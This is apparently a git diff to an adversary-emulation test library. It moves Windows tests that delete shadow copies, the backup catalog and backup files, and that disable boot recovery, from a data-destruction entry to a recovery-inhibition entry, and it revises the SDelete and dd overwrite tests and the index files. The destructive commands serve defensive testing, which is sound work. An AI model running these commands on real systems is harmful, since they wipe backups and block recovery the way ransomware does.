diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index 66d0d18b..f7b2f8b7 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -8,103 +8,16 @@ To maximize impact on the target organization in operations where network-wide a
## Atomic Tests
-- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)
+- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete)
-- [Atomic Test #2 - Windows - Delete Windows Backup Catalog](#atomic-test-2---windows---delete-windows-backup-catalog)
-
-- [Atomic Test #3 - Windows - Disable Windows Recovery Console Repair](#atomic-test-3---windows---disable-windows-recovery-console-repair)
-
-- [Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete)
-
-- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
-
-- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
-## Atomic Test #1 - Windows - Delete Volume Shadow Copies
-Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-vssadmin.exe delete shadows /all /quiet
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #2 - Windows - Delete Windows Backup Catalog
-Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-wbadmin.exe delete catalog -quiet
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair
-Disables repair by the Windows Recovery Console on boot.
-This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
-bcdedit.exe /set {default} recoveryenabled no
-```
-
-#### Cleanup Commands:
-```cmd
-bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
-bcdedit.exe /set {default} recoveryenabled yes
-```
-
-
-
-
-
-
-
-
-## Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete
-Overwrites and deletes a file using Sysinternals SDelete.
-Requires the download of either Sysinternals Suite or the individual SDelete utility.
+## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
+Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
+the powershell session along with other information about the file that was deleted.
**Supported Platforms:** Windows
@@ -114,15 +27,15 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| sdelete_exe | Path of sdelete executable | Path | PathToAtomicsFolder\T1485\bin\sdelete.exe|
+| sdelete_exe | Path of sdelete executable | Path | $env:TEMP\Sdelete\sdelete.exe|
+| file_to_delete | Path of file to delete | path | $env:TEMP\T1485.txt|
#### Attack Commands: Run with `powershell`!
```powershell
-New-Item $env:TEMP\T1485.txt
-#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
+Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
```
@@ -132,14 +45,22 @@ New-Item $env:TEMP\T1485.txt
##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{sdelete_exe}) {0} else {1}
+if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
-New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
-Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
+Remove-Item $env:TEMP\SDelete.zip -Force
+```
+##### Description: The file to delete must exist at #{file_to_delete}
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+New-Item #{file_to_delete} -Force | Out-Null
```
@@ -148,7 +69,7 @@ Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
-## Atomic Test #5 - macOS/Linux - Overwrite file with DD
+## Atomic Test #2 - macOS/Linux - Overwrite file with DD
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
@@ -176,28 +97,4 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
-
-
-
-## Atomic Test #6 - Windows - Delete Backup Files
-Deletes backup files in a manner similar to Ryuk ransomware.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
-```
-
-
-
-
-
-
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 1cf97717..d0bf8477 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -21,6 +21,8 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
+- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+
@@ -133,6 +135,11 @@ bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
+#### Cleanup Commands:
+```cmd
+bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
+bcdedit.exe /set {default} recoveryenabled yes
+```
@@ -165,4 +172,29 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
+
+
+
+## Atomic Test #6 - Windows - Delete Backup Files
+Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
+to delete files from around the system.
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+```
+
+
+
+
+
+
diff --git a/atomics/index.md b/atomics/index.md
index 41e1d47b..ddddc195 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -493,12 +493,8 @@
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- [T1485 Data Destruction](./T1485/T1485.md)
- - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
- - Atomic Test #6: Windows - Delete Backup Files [windows]
+ - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
+ - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -511,6 +507,7 @@
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
+ - Atomic Test #6: Windows - Delete Backup Files [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 59b3f4a8..88e41b50 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -15971,73 +15971,39 @@ impact:
modified: '2019-07-19T14:34:28.595Z'
identifier: T1485
atomic_tests:
- - name: Windows - Delete Volume Shadow Copies
- description: 'Deletes Windows Volume Shadow Copies. This technique is used by
- numerous ransomware families and APT malware such as Olympic Destroyer.
-
-'
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: true
- command: 'vssadmin.exe delete shadows /all /quiet
-
-'
- - name: Windows - Delete Windows Backup Catalog
- description: 'Deletes Windows Backup Catalog. This technique is used by numerous
- ransomware families and APT malware such as Olympic Destroyer.
-
-'
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: true
- command: 'wbadmin.exe delete catalog -quiet
-
-'
- - name: Windows - Disable Windows Recovery Console Repair
- description: |
- Disables repair by the Windows Recovery Console on boot.
- This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: true
- command: |
- bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- bcdedit.exe /set {default} recoveryenabled no
- cleanup_command: |
- bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
- bcdedit.exe /set {default} recoveryenabled yes
- name: Windows - Overwrite file with Sysinternals SDelete
description: |
- Overwrites and deletes a file using Sysinternals SDelete.
- Requires the download of either Sysinternals Suite or the individual SDelete utility.
+ Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
+ the powershell session along with other information about the file that was deleted.
supported_platforms:
- windows
input_arguments:
sdelete_exe:
description: Path of sdelete executable
type: Path
- default: PathToAtomicsFolder\T1485\bin\sdelete.exe
+ default: "$env:TEMP\\Sdelete\\sdelete.exe"
+ file_to_delete:
+ description: Path of file to delete
+ type: path
+ default: "$env:TEMP\\T1485.txt"
dependency_executor_name: powershell
dependencies:
- description: Secure delete tool from Sysinternals must exist on disk at specified
location (#{sdelete_exe})
- prereq_command: 'if (Test-Path #{sdelete_exe}) {0} else {1}'
+ prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}'
get_prereq_command: |-
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
- New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
- Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
+ Remove-Item $env:TEMP\SDelete.zip -Force
+ - description: 'The file to delete must exist at #{file_to_delete}'
+ prereq_command: 'if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1
+ }'
+ get_prereq_command: 'New-Item #{file_to_delete} -Force | Out-Null'
executor:
name: powershell
- command: |
- New-Item $env:TEMP\T1485.txt
- #{sdelete_exe} -accepteula $env:TEMP\T1485.txt
+ command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
+
+'
- name: macOS/Linux - Overwrite file with DD
description: |
Overwrites and deletes a file using DD.
@@ -16058,19 +16024,6 @@ impact:
name: bash
command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
-'
- - name: Windows - Delete Backup Files
- description: 'Deletes backup files in a manner similar to Ryuk ransomware.
-
-'
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: true
- command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
- c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
-
'
'':
technique:
@@ -16250,6 +16203,9 @@ impact:
command: |
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
+ cleanup_command: |
+ bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
+ bcdedit.exe /set {default} recoveryenabled yes
- name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
description: |
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
@@ -16263,6 +16219,19 @@ impact:
elevation_required: true
command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
+'
+ - name: Windows - Delete Backup Files
+ description: |
+ Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
+ to delete files from around the system.
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
+ c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+
'
T1496:
technique:
diff --git a/atomics/linux-index.md b/atomics/linux-index.md
index b698d0ab..d900a71f 100644
--- a/atomics/linux-index.md
+++ b/atomics/linux-index.md
@@ -39,7 +39,7 @@
# impact
- [T1531 Account Access Removal](./T1531/T1531.md)
- [T1485 Data Destruction](./T1485/T1485.md)
- - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
+ - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/macos-index.md b/atomics/macos-index.md
index 4f6557a3..5cf8dce9 100644
--- a/atomics/macos-index.md
+++ b/atomics/macos-index.md
@@ -56,7 +56,7 @@
# impact
- [T1531 Account Access Removal](./T1531/T1531.md)
- [T1485 Data Destruction](./T1485/T1485.md)
- - Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
+ - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 15cdc6f1..c64363d7 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -356,11 +356,7 @@
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- [T1485 Data Destruction](./T1485/T1485.md)
- - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- - Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- - Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- - Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- - Atomic Test #6: Windows - Delete Backup Files [windows]
+ - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -373,6 +369,7 @@
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
+ - Atomic Test #6: Windows - Delete Backup Files [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)